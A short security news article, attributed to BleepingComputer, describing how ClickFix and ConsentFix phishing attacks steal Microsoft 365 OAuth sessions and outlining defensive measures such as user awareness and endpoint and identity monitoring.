The Mechanics of ClickFix and ConsentFix
A new wave of attacks targets Microsoft 365 accounts by exploiting user familiarity with routine web interactions. The ClickFix technique, which surged in 2025, displays a fake prompt that instructs victims to press keyboard shortcuts. This action pastes and executes attacker supplied commands on the user’s own machine, bypassing traditional security defenses without exploiting any software vulnerability.
Attackers have now evolved this approach into a more sophisticated variant called ConsentFix. This method shifts the attack surface to Microsoft 365’s OAuth consent flows. Victims receive a phishing lure through trusted platforms like Dropbox or DocSend, often behind a password that evades security inspections. The user then encounters a seemingly standard Microsoft authentication screen and is asked to drag a localhost callback link into the browser, a step that unknowingly surrenders OAuth tokens.
Impact and Proliferation
ConsentFix allows attackers to steal session access to email and other Microsoft 365 services without requiring passwords or bypassing multi factor authentication. The victim completes what appears to be a legitimate authentication flow, and the session itself is stolen. By early March 2026, a detailed walkthrough of ConsentFix was posted to a public Russian cybercrime forum, including working code, infrastructure screenshots, and a video tutorial.
The attack infrastructure relies on free or widely available services, and the forum post also outlined how attackers profile targets using LinkedIn and similar tools before sending phishing messages. This lowering of the barrier to entry means techniques that once required significant technical skill are now packaged with step by step guidance.
Defensive Strategies
Awareness remains a critical defense. These attacks depend on users moving through familiar workflows without pausing to question unusual requests like pressing hotkeys or dragging strange links. Defenders also need detection coverage for traces these attacks leave behind, such as unusual PowerShell activity from normal user processes or new session logins from unexpected locations.
Endpoint and identity monitoring can surface these signals before a brief user lapse leads to full account compromise. The core pattern is that attackers interrupt a normal workflow at the right moment and let the victim complete the attack. Understanding this pattern is the first step toward stopping it.
Source: BleepingComputer
